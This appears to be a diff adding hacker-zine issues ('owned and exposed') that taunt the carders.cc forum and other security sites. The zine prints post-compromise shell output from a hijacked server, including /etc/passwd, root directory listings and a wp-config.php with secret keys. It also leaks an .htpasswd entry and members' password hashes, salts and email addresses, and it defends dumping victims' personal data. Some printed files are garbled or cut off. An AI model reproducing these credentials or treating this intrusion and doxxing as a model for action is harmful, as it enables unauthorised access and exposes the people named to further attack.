+*//////{<>===[OUTRO]=================================================- + \ + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Zagerus: Alle neuen privaten Nachrichten werden ab sofort | +| verschluesselt in der Datenbank gespeichert. | +|____________________________________________________________________| + +~$ grep -ri -A 1 -B 1 base64_encode Sources/Subs-Post.php + // Encode the message + $message = base64_encode($message); + $encoded = 1; + +Oh noes, blimey. We are screwed, they encoded their messages with +base64. We had to surrender at this point. Their protection system was +just too good. Nearly unbreakable. Like THANAT0S said: + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| THANAT0S: Ein neuer Rootserver, mehr Protection! (Hosting in | +| Moskau/Ukraine) | +|____________________________________________________________________| + +To the carders.cc admins: Recommendation No.1 - THE ANAL PROBINATOR + ______ + / ____ \ + ___________/_|----|_\_____________ + _______/||/,-.\|||||||----|__ ____ .--' + ,-| __/--' |o| `-----|____|-' | \ \ + ( |___(o7 \4b\ | |___ >---< <`. + >-| __/------.\4b\ ,---| |--' | /db`.> + ( | (o7|||||||| |o| |||||----|____ | /d88[( + `-|__/----,-""""""""">--|____|---' |__/d88P / + <____/----------<___|____|_____________/ + \ `----' / + `------' + +AND NOW ITS TIME FOR OUR FIRST ... +______________________________________________________________________ +IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI +Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI +Ip| __| |.---.-.-----.| _ | |_| |_.---.-.----.| |--.| |aI +Ia|__ | || _ | _ || | _| _| _ | __|| < |__|lI +Il|_______|__||___._| __||___|___|____|____|___._|____||__|__||__|sI +Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI +IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI + Addressed to all the lamers out there + +DEIM0S - You get a SlapAttack since you were responsible for security + we heard. You did a great job dude, n1. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Juri: alles was von Deimos gemacht worden war ,war 100 % fach- | +| maennisch und 1000% sicher. | +|____________________________________________________________________| + +Zagerus - The "techadmin". Who taught you to be techadmin? You wrote + this anti ddos script right? SlapAttack for you! + +$~ cat ipz.php +'.$IP.''; + /*$fp = fopen($logfile, "a"); + @fwrite($fp, $logdetails); + @fwrite($fp, "
"); + @fclose($fp);*/ + echo "

DDoS-Attacke

\nWir stehen zur Zeit unter DDoS. Der Login blockt die Abfragen etwas ab.

\nBitte geben Sie als Benutzernamen und Passwort \"ddos\" ein.

Vielen Dank fuer Ihr Verstaendnis!"; +?> + +THANAT0S, +KRON0S - Great admins, everyone should be like you. And btw you suck + at choosing nicknames. SlapAttack! + +fred777 - You have actually not a lot to do with this, but you get a + SlapAttack because we hate you. Ok not only for that... You + are simply lame and dumb and you suck at almost everything + you do. We recommend you to fuck off and take our orders + at burger king THANX. + +So thats all actually. +And btw to all the other supporters of pseudo German undergroud shit: +The ninja guys piss on you and your half trained monkeys or whatever +your leet underground team consists of. If you continue, you will be +owned over again and rm'd twice. Also we will punch you in the face. + + Have a good day |\_ + /()/ + `\| and stay happy <3 + + diff --git a/owned and exposed/2.txt b/owned and exposed/2.txt new file mode 100644 index 0000000..d888272 --- /dev/null +++ b/owned and exposed/2.txt @@ -0,0 +1,4975 @@ + |\___/| + -=[ISSUE - NO 2]=- =) ^Y^ (= + -=[OF]=- \ ^ / + )=*=( + ______________________________ __ ____________ _ / \ +|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | +|| _ | | | | | -__| _ | | . | | . || /| | | |\ +||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ +| | | ______ |__//_// ___/ __ +| | | .-----.--.--.-----.| |.-----.--\_).--| || +| | | | -__|_ _| _ || || ||__ --| -__| _ || +| | | |_____|__.__| __|| || ||_____|_____|_____|| +|_/ \__________________________|__|___| || |___________________| + |______| +------------------------.++- + / y- + / y- +---------------------/ s/----------------------.++- + / ys+-. |\ / y- +---------------\.../ /\ ys------/()/ / y- + sy \/ /'''\ \| / s/- +------------------+-++s /-----' / s+-. +---------------------/s /-------------\.../ /\ ys + -y s sy \/ /'''\ +-----------------------y s---------------------++s /-----' +----------------------++' |\ /s / +-------------------------------------/()/ -y ys + \| -y s +-------------------------------------------------++' + |_______________ +,_._._._._._._._,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _| carders.cc `\ +|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| inj3ct0r \ + ~ Featuring ~ | ettercap \ + _______________| |___________________\ + /´ exploit-db | ! + / backtrack |_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _,_._._._._._._._, + / free-hack |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| + /___________________| ~ and ~ + ! + + Out of the Blue + into the Black +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ INTRO ~ ! + +Greetings followers, welcome to the second issue of owned and exp0sed. +This file is encoded with UTF-8, so to view it properly use unicode. + +For those who are reading and laughing with us: +We (your happy ninjas) wish you a + + , + _/^\_ + < hax > + /.-.\ + * MERRY * `/&\` + ,@.*;@, + /_o.I %_\ + (`'--:o(_@; + /`;--.,__ `') + ;@`o % O,*`'`&\ + (`'--)_@ ;o %'()\ + * NINJA * /`;--._`''--._O'@; + /&*,()~o`;-.,_ `""`) + /`,@ ;+& () o*`;-';\ + (`""--.,_0 +% @' &()\ + /-.,_ ``''--....-'`) + /@%;o`:;'--,.__ __.'\ + ;*,&(); @ % &^;~`"`o;@(); + * HAXMAS * /(); o^~; & ().o@*&`;&%O\ + `"="==""==,,,.,="=="==="` + __.----.(\-''#####---...___...-----._ + '` \)_`"""""` + .--' `) + o( )_-\ + `"""` ` + +After our first release we got wind of some strange rumours. So just +to be sure, we need to clarify some facts. + +So, who are we? First, lets talk about some things we are not. We are +not an underground rival kiddy group. We are not a cyber mafia gang. +We are the watchmen, the hackers who quietly observe the scene. If any +skiddy community gets too big, we shut them down. If any lamer causes +too much trouble, we shut them down. If any group keeps fucking stuff +up, we stop them. + +So, why are we doing this? Some people say that being a vigilanty is +wrong and that we are actually criminals. What can we say? This may be +true. But the way we see it, if your not part of the solution, your +part of the fucking problem. These idiots spread garbage across our +scene and that is why they got owned. We take pride in what is left of +the scene and we have serious problems with those who rape it. + +That's why we do what MUST be done. + +There are some things left we would like to say about carders.cc. +First of all, they came back online after they got rm'ed. In the first +issue we gave our word that we would make sure carders.cc would never +come back. Well, we delivered on that promise in this issue. And as +such carders.cc has once again been eliminated. Maybe this time they +will get the hint. + +Also, Heise Security said that we were a rival group trying to +capitalize on the demise of carders.cc. Apparently they weren't happy +about our disclosure of the carders.cc database that included the +personal information of carders.cc victims. What Heise forgot was that +with this action, all the victims of carders.cc got the chance to +realize that they were victims of fraud. You can try to say that our +disclosure of the database put them at even greater risk of fraud but +we disagree. What is more risky? Having your information secretly on +an "underground" carding forum where it WILL be sold and used in +frauduelent activity? Or, having it released so that you can be +notified and take the appropriate action to mitigate the damage that +has been done? I know which option I'd rather have. + +It is quite impressive how many people wrote about the Carders Hack +without even bothering to read the zine. It is hilarious to see how +the media works. Somebody writes an article, others copy information +from it, others copy from it again. If we take a shit in a bowl. Then +you eat that shit and puke it back into a different bowl for someone +else to eat then they do the same thing, what do you have? "Two +Journo's One Cup" is what you have. Fucking pathetic. + +On the other hand, we'd like to thank Brian Krebs. Even if some of his +conclusions were way off the mark, he was still the first one to +report about carders.cc and nearly every other article was based on +Brian's work. At least you didn't eat shit and regurgitate it like the +rest Brian, keep up the good work. + +Enough jibber jabber, let's get to business. You will soon realize +that our targets vary: + +We owned ettercap because we were tired of people firing that shit up +and pretending to be a l33th4x0r sheep who think they are the greatest +hackerz with their ARP spoofing toolkitz.. If you have installed +ettercap in the last 5 years you may want to check yo shit (;p). + +We owned offsec including backtrack and exploit-db because they are +fucking security "expert" maggots (oops s/m/f/) who just fail so hard +at security that we wonder why people really take their training +courses. We imagine it's like open mic night at the laughatorium. + +We owned inj3ct0r because they are lameass wannabe milw0rm kids whose +sole purpose in life is to disclose XSS 0dayz in Joomla (RSnake +anyone?). + +We owned carders.cc (AGAIN) because they are unable to learn from +their mistakes and keep spreading garbage around the underground. + +We owned free-hack because they are developing into one of the +largest, most arrogant script-kiddie breeding grounds on the +intertubez. + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ carders.cc ~ ! + +Here we go again. We hope that everybody was looking forward to see +carders.cc getting owned again. We kept our word, didn't we? Let us +begin: + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| The ninja guys piss on you and your half trained monkeys or | +| whatever your leet underground team consists of. If you continue, | +| you will be owned over again and rm'd twice. Also we will punch | +| you in the face. | +|____________________________________________________________________| + +Our lazy ninja squad was too drunk to come over and punch you in the +fucking face. So we'll just stick to owning you for now. Carders.cc +went down for a few days, but came back as if nothing had happened. +They switched some server admins and installed some new software in +the hopes that they would be safe. They turned on some l33t "security" +settings like PHP's "Safe Mode" and "Openbase Dir", and they also +disabled lots of functions. All in all they thought they were pretty +locked down. Well, obviously they were fucking wrong. It's hard to +harden a system when everything is backdoored and unfortunately we are +just too ninja to get stopped by your silly protections. You can never +stop us. We will always keep owning and exp0sing you. + +No. Matter. What. You. Try. + +$ uname -a +FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 + +$ id +uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc) + +$ w + 1:24AM up 11 days, 4:23, 0 users, load averages: 0.37, 0.48, 0.54 +USER TTY FROM LOGIN@ IDLE WHAT + +$ alias ls="ls -la" + +$ ls + +total 47 +drwxr-xr-x 17 root wheel 512 Jul 3 19:12 . +drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .. +-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc +-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile +-r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT +-rw-r--r-- 1 root wheel 0 Jul 3 19:12 a +drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin +drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot +dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev +drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc +drwxr-x--x 4 root wheel 512 Nov 1 23:54 home +drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib +drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec +drwxr-xr-x 2 root wheel 512 Jan 18 2010 media +drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt +dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc +drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root +drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin +lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys +drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp +drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr +drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var + +$ cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin +cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin + +$ cd /root + +$ ls +total 412628 +drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 . +drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .. +-rw------- 1 root wheel 1856 Dec 5 23:53 .bash_history +-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc +-rw------- 1 root wheel 2909 Dec 7 22:31 .history +-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login +-rw------- 1 root wheel 61 Jul 5 21:44 .lesshst +-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login +drwx------ 3 root wheel 512 Dec 6 02:34 .mc +-rw------- 1 root wheel 641 Nov 8 20:33 .mysql_history +-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile +drwx------ 2 root wheel 512 Nov 7 17:20 .ssh +-rw-r--r-- 1 root wheel 417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql +drwxr-xr-x 3 root wheel 512 Jul 3 00:34 backup +drwxr-xr-x 4 root wheel 512 Nov 8 17:58 backups +drwxr-xr-x 2 root wheel 512 Jul 20 2009 crack +-rw-r--r-- 1 root wheel 3223 Jul 20 2009 crack.zip +-rw-r--r-- 1 root wheel 85 Aug 9 03:31 ddos.php +-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php +drwxr-xr-x 3 root wheel 512 Jul 5 00:41 greensql +-rw-r--r-- 1 root wheel 20 Aug 9 03:26 info.php +-rw------- 1 root wheel 16877 Jul 29 20:44 mbox +drwxr-xr-x 3 root wheel 512 Jul 3 18:59 php +drwxr-xr-x 14 carderscc carderscc 1536 Nov 2 16:15 proftpd-1.3.3c +-rw-r--r-- 1 root wheel 4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz +drwxr-xr-x 2 root wheel 512 Nov 8 18:50 stylebackup + +Mad PHP-Codez again! + +$ cat ddos.php + + +$ cat info.php + + +$ cat example.php + + +$ cd /home/carderscc + +$ ls +total 18 +drwxr-x--- 7 carderscc www 512 Nov 18 20:45 . +drwxr-x--x 4 root wheel 512 Nov 1 23:54 .. +dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 carders.cc +drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 jabber.carders.cc +drwxrwxr-x 11 carderscc www 3072 Nov 8 17:27 pma +drwxrwxrwx 2 carderscc www 2048 Dec 6 00:40 temp +drwxrwxr-x 5 carderscc www 512 Nov 6 19:47 vbseo + +$ cd carders.cc + +$ ls +total 2286 +dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 . +drwxr-x--- 7 carderscc www 512 Nov 18 20:45 .. +-r-xr-x--- 1 carderscc www 1107 Dec 5 15:34 .htaccess +-r-xr-x--- 1 carderscc www 20 Nov 12 18:16 .htpasswd +dr-xr-x--- 4 carderscc www 2048 Nov 18 21:17 admincp +-r-xr-x--- 1 carderscc www 40115 Oct 29 20:53 ajax.php +-r-xr-x--- 1 carderscc www 75525 Oct 29 20:53 album.php +-r-xr-x--- 1 carderscc www 19041 Oct 29 20:52 announcement.php +dr-xr-x--- 2 carderscc www 512 Oct 29 22:39 archive +-r-xr-x--- 1 carderscc www 8668 Oct 29 20:52 asset.php +-r-xr-x--- 1 carderscc www 20406 Oct 29 20:52 assetmanage.php +-r-xr-x--- 1 carderscc www 15710 Oct 29 20:52 attachment.php +-r-xr-x--- 1 carderscc www 6658 Oct 29 20:52 attachment_inlinemod.php +-r-xr-x--- 1 carderscc www 3449 Oct 29 20:52 blog_attachment.php +-r-xr-x--- 1 carderscc www 96043 Oct 29 20:53 calendar.php +-r-xr-x--- 1 carderscc www 43 Oct 29 20:52 clear.gif +dr-xr-x--- 9 carderscc www 3584 Nov 2 00:32 clientscript +-r-xr-x--- 1 carderscc www 15270 Oct 29 20:52 converse.php +dr-xr-x--- 7 carderscc www 512 Nov 2 00:33 cpstyles +-r-xr-x--- 1 carderscc www 3231 Oct 29 20:52 cron.php +-r-xr-x--- 1 carderscc www 5139 Oct 29 20:52 css.php +dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customavatars +dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customgroupicons +dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 customprofilepics +-r-xr-x--- 1 carderscc www 1707 Oct 29 20:52 editor.php +-r-xr-x--- 1 carderscc www 46932 Oct 29 20:53 editpost.php +-r-xr-x--- 1 carderscc www 1326 Oct 29 20:52 entry.php +-r-xr-x--- 1 carderscc www 30006 Oct 29 20:53 external.php +-r-xr-x--- 1 carderscc www 9888 Oct 29 20:52 faq.php +-r-xr-x--- 1 carderscc www 5430 Jul 29 15:42 favicon.ico +-r-xr-x--- 1 carderscc www 22568 Oct 29 20:53 forum.php +-r-xr-x--- 1 carderscc www 42374 Oct 29 20:53 forumdisplay.php +-r-xr-x--- 1 carderscc www 1988 Oct 29 20:52 global.php +-r-xr-x--- 1 carderscc www 155760 Oct 29 20:54 group.php +-r-xr-x--- 1 carderscc www 26072 Oct 29 20:53 group_inlinemod.php +-r-xr-x--- 1 carderscc www 11470 Oct 29 20:53 groupsubscription.php +-r-xr-x--- 1 carderscc www 8961 Oct 29 20:53 image.php +dr-xr-x--- 28 carderscc www 1536 Nov 22 16:54 images +dr-xr-x--- 9 carderscc www 6144 Nov 6 19:47 includes +-r-xr-x--- 1 carderscc www 2318 Oct 29 20:53 index.php +-r-xr-x--- 1 carderscc www 46943 Oct 29 20:53 infraction.php +-r-xr-x--- 1 carderscc www 187725 Oct 29 20:54 inlinemod.php +-r-xr-x--- 1 carderscc www 23934 Jul 29 21:10 invites.php +-r-xr-x--- 1 carderscc www 6778 Aug 14 08:15 itrader.php +-r-xr-x--- 1 carderscc www 14964 Aug 14 08:15 itrader_detail.php +-r-xr-x--- 1 carderscc www 13515 Aug 14 08:15 itrader_feedback.php +-r-xr-x--- 1 carderscc www 1405 Aug 14 08:15 itrader_global.php +-r-xr-x--- 1 carderscc www 22171 Aug 14 08:15 itrader_main.php +-r-xr-x--- 1 carderscc www 3970 Aug 14 08:15 itrader_report.php +-r-xr-x--- 1 carderscc www 11362 Oct 29 20:53 joinrequests.php +-r-xr-x--- 1 carderscc www 1643 Oct 29 20:53 list.php +-r-xr-x--- 1 carderscc www 10869 Oct 29 20:53 login.php +dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 madp +-r-xr-x--- 1 carderscc www 30166 Oct 29 20:53 member.php +-r-xr-x--- 1 carderscc www 16314 Oct 29 20:53 member_inlinemod.php +-r-xr-x--- 1 carderscc www 40267 Oct 29 20:53 memberlist.php +-r-xr-x--- 1 carderscc www 22186 Oct 29 20:53 misc.php +dr-xr-x--- 2 carderscc www 512 Nov 6 19:48 modcp +-r-xr-x--- 1 carderscc www 76749 Oct 29 20:53 moderation.php +-r-xr-x--- 1 carderscc www 6701 Oct 29 20:53 moderator.php +-r-xr-x--- 1 carderscc www 17474 Oct 29 20:53 newattachment.php +-r-xr-x--- 1 carderscc www 41001 Oct 29 20:53 newreply.php +-r-xr-x--- 1 carderscc www 20107 Oct 29 20:53 newthread.php +-r-xr-x--- 1 carderscc www 21724 Oct 29 20:53 online.php +dr-xr-x--- 5 carderscc www 512 Nov 2 00:33 packages +-r-xr-x--- 1 carderscc www 8018 Oct 29 20:53 payment_gateway.php +-r-xr-x--- 1 carderscc www 13282 Oct 29 20:53 payments.php +-r-xr-x--- 1 carderscc www 3984 Oct 29 20:53 picture.php +-r-xr-x--- 1 carderscc www 16587 Oct 29 20:53 picture_inlinemod.php +-r-xr-x--- 1 carderscc www 26091 Oct 29 20:53 picturecomment.php +-r-xr-x--- 1 carderscc www 29260 Oct 29 20:53 poll.php +-r-xr-x--- 1 carderscc www 10336 Oct 29 20:53 posthistory.php +-r-xr-x--- 1 carderscc www 76507 Oct 29 20:54 postings.php +-r-xr-x--- 1 carderscc www 7009 Oct 29 20:53 printthread.php +-r-xr-x--- 1 carderscc www 79357 Oct 29 20:54 private.php +-r-xr-x--- 1 carderscc www 163617 Oct 29 20:55 profile.php +-r-xr-x--- 1 carderscc www 56285 Oct 29 20:54 register.php +-r-xr-x--- 1 carderscc www 7216 Oct 29 20:53 report.php +-r-xr-x--- 1 carderscc www 14687 Oct 29 20:53 reputation.php +-r-xr-x--- 1 carderscc www 34539 Oct 29 20:54 search.php +-r-xr-x--- 1 carderscc www 22632 Oct 29 20:54 sendmessage.php +-r-xr-x--- 1 carderscc www 12407 Oct 29 20:54 showgroups.php +-r-xr-x--- 1 carderscc www 12660 Oct 29 20:54 showpost.php +-r-xr-x--- 1 carderscc www 80037 Oct 29 20:54 showthread.php +dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 signaturepics +dr-xr-x--- 2 carderscc www 512 Nov 2 00:32 store_sitemap +-r-xr-x--- 1 carderscc www 38784 Oct 29 20:54 subscription.php +-r-xr-x--- 1 carderscc www 5321 Oct 29 20:54 tags.php +-r-xr-x--- 1 carderscc www 8722 Oct 29 20:54 threadrate.php +-r-xr-x--- 1 carderscc www 11068 Oct 29 20:54 threadtag.php +-r-xr-x--- 1 carderscc www 61 Oct 29 20:52 uploadprogress.gif +-r-xr-x--- 1 carderscc www 39639 Oct 29 20:54 usercp.php +-r-xr-x--- 1 carderscc www 20956 Oct 29 20:54 usernote.php +-r-xr-x--- 1 carderscc www 16518 Jul 29 16:35 vaispy.php +dr-xr-x--- 13 carderscc www 1024 Nov 2 00:32 vb +dr-xr-x--- 4 carderscc www 512 Nov 6 19:48 vbseo +-r-xr-x--- 1 carderscc www 45239 Nov 6 19:48 vbseo.php +-r-xr-x--- 1 carderscc www 4112 Nov 6 19:47 vbseocp.php +-r-xr-x--- 1 carderscc www 27801 Oct 29 20:54 visitormessage.php +-r-xr-x--- 1 carderscc www 1647 Oct 29 20:54 widget.php +-r-xr-x--- 1 carderscc www 3769 Oct 29 20:54 xmlsitemap.php + +$ cat .htpasswd +ddos:XScRLnTwdeJ6k + +$ cat includes/config.php + usr/src/sys +drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp +drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr +drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var + +?> + +$ cd /home/cardersblog + +$ ls +total 8 +drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 . +drwxr-x--x 4 root wheel 512 Nov 1 23:54 .. +dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 blog.carders.cc +drwxrwxrwx 2 cardersblog www 512 Nov 2 01:16 temp + +$ cd blog.carders.cc + +$ ls +total 2928 +dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 . +drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 .. +-rw-r--r-- 1 cardersblog www 188 Nov 21 00:18 .htaccess +-r-xr-x--- 1 cardersblog www 397 Aug 27 17:22 index.php +-r-xr-x--- 1 cardersblog www 2683109 Jul 18 16:06 latest.tar.gz +-r-xr-x--- 1 cardersblog www 15410 Aug 27 17:22 license.txt +-r-xr-x--- 1 cardersblog www 9122 Aug 27 17:22 readme.html +-r-xr-x--- 1 cardersblog www 4391 Aug 27 17:22 wp-activate.php +dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-admin +-r-xr-x--- 1 cardersblog www 40284 Aug 27 17:23 wp-app.php +-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-atom.php +-r-xr-x--- 1 cardersblog www 274 Aug 27 17:23 wp-blog-header.php +-r-xr-x--- 1 cardersblog www 3926 Aug 27 17:23 wp-comments-post.php +-r-xr-x--- 1 cardersblog www 238 Aug 27 17:23 wp-commentsrss2.php +-r-xr-x--- 1 cardersblog www 3173 Aug 27 17:23 wp-config-sample.php +-r-xr-x--- 1 cardersblog www 3506 Jul 31 14:20 wp-config.php +dr-xr-x--- 6 cardersblog www 512 Aug 27 18:05 wp-content +-r-xr-x--- 1 cardersblog www 1255 Aug 27 17:23 wp-cron.php +-r-xr-x--- 1 cardersblog www 240 Aug 27 17:23 wp-feed.php +dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-includes +-r-xr-x--- 1 cardersblog www 2002 Aug 27 17:23 wp-links-opml.php +-r-xr-x--- 1 cardersblog www 2441 Aug 27 17:23 wp-load.php +-r-xr-x--- 1 cardersblog www 26059 Aug 27 17:23 wp-login.php +-r-xr-x--- 1 cardersblog www 7774 Aug 27 17:23 wp-mail.php +-r-xr-x--- 1 cardersblog www 487 Aug 27 17:23 wp-pass.php +-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rdf.php +-r-xr-x--- 1 cardersblog www 316 Aug 27 17:23 wp-register.php +-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rss.php +-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-rss2.php +-r-xr-x--- 1 cardersblog www 9177 Aug 27 17:23 wp-settings.php +-r-xr-x--- 1 cardersblog www 18695 Aug 27 17:23 wp-signup.php +-r-xr-x--- 1 cardersblog www 3702 Aug 27 17:23 wp-trackback.php +-r-xr-x--- 1 cardersblog www 94184 Aug 27 17:23 xmlrpc.php + +$ cat wp-config.php +/?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V['); +define('NONCE_KEY', '|R(!,}:(`utsK5kQ0$LoSd=e?X+C]bqBEp5WWbWLSb'); + +/**#@-*/ + +/** + * WordPress Database Table prefix. + * + * You can have multiple installations in one database if you give each a unique + * prefix. Only numbers, letters, and underscores please! + */ +$table_prefix = 'wp_'; + +/** + * WordPress Localized Language, defaults to English. + * + * Change this to localize WordPress. A corresponding MO file for the chosen + * language must be installed to wp-content/languages. For example, install + * de.mo to wp-content/languages and set WPLANG to 'de' to enable German + * language support. + */ +define ('WPLANG', ''); + +/** + * For developers: WordPress debugging mode. + * + * Change this to true to enable the display of notices during development. + * It is strongly recommended that plugin and theme developers use WP_DEBUG + * in their development environments. + */ +define('WP_DEBUG', false); + +/* That's all, stop editing! Happy blogging. */ + +/** Absolute path to the WordPress directory. */ +if ( !defined('ABSPATH') ) + define('ABSPATH', dirname(__FILE__) . '/'); + +/** Sets up WordPress vars and included files. */ +require_once(ABSPATH . 'wp-settings.php'); + +## + + + | + __________ | + _ __ _ | | | + /_\ / \ /_\ | | | + put shit =|= | // | =|= | | | + to shit ! \__/ ! | | | + carders.cc _ | | | + ___ | ___ //' | | | + [___] | _ :=| |=: __T_||_T__ |p= | | + | ~| | =)_)= | | [__________] | | | + | | | (_( |xXx| \_ _/ | | | + | | | )_) """"" \ / | | | + \___| V | | | | | + | `========, | | | | | +________`. .'_________________| |________|__________lc_| + `. .' (____) \ + _| |_... .;;;;;;;;. \ + (________);;;; :;;;;;;;;;;: + :::::::' '::::::::' HAPPY NINJA BATHROOM + +Team Member Passes: + +Vitali:28cf8ccb53f80f7e8fca5e781f2e6424:dusFzU/ZvUe;e@fx\\3>XIgN[yGx9[*:admin@carders.cc +Juri:9475264713e83164de106d099350ff97:pqfgN4x7P)5_}0-E+PsIJ\\=_o1|oV&:daafagafd@dadadagfasg.dsxc +Luigi:13ae8bfbd4fc44302fc6261f58dd583e:.u5//.-K4`u$lm00M3V}h:d397080@lhsdv.com +Poseidon:0c18d81bcfa2845490f75e785f0e2457:BG$vA-%K_X<=|nF:tiberiusus@carders.in + + +You guys dont get it, do you? We told you to fuck off and still you +did not listen. We are not sorry for doing it again. You deserve it. + + ____________________________________________________|_._._._._._._._, + \___________________________________________________|_|_|_|_|_|_|_|_| + ! ~ inj3ct0r ~ + +#`````````` ___ ____ ____ +#````______/```\__//```\__/____\ +#``_/```\_/``:```````````//____\ +#`/|``````:``:``..``````/````````\ W A R N I N G !!! DISCOVERED LAMER O_o +#|`|`````::`````::``````\````````/ +#|`|`````:|`````||`````\`\______/ +#|`|`````||`````||``````|\``/``| +#`\|`````||`````||``````|```/`|`\ 1) maybe you were wrong address, go 